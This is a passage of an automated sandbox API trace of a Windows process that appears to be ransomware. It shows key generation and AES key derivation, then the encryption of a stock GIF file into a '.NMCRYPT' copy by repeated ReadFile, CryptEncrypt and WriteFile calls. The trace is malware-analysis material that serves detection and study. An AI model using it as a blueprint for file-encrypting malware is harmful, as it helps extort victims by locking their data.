pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.940] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.941] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.941] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.941] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.941] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.941] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.941] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.941] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.941] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.941] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.941] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0162.941] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.941] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad738) returned 1 [0162.941] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0162.941] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0162.941] wcslen (_String="\\\\?\\") returned 0x4 [0162.942] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad278) returned 1 [0162.942] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0162.942] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0162.942] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=4587) returned 1 [0162.942] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0162.943] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.944] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.944] GetLastError () returned 0x0 [0162.944] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.968] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.968] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.968] GetLastError () returned 0x0 [0162.968] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.968] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.969] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.969] GetLastError () returned 0x0 [0162.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.969] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.969] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.969] GetLastError () returned 0x0 [0162.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.969] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.969] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.969] GetLastError () returned 0x0 [0162.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.969] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.969] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.969] GetLastError () returned 0x0 [0162.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.969] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.969] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.969] GetLastError () returned 0x0 [0162.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.969] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.969] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.969] GetLastError () returned 0x0 [0162.969] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.969] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.969] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.969] GetLastError () returned 0x0 [0162.970] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.970] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.970] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.970] GetLastError () returned 0x0 [0162.970] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.970] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.970] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.970] GetLastError () returned 0x0 [0162.970] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.970] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.970] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.970] GetLastError () returned 0x0 [0162.970] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.970] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.970] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.970] GetLastError () returned 0x0 [0162.970] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.970] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.970] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, 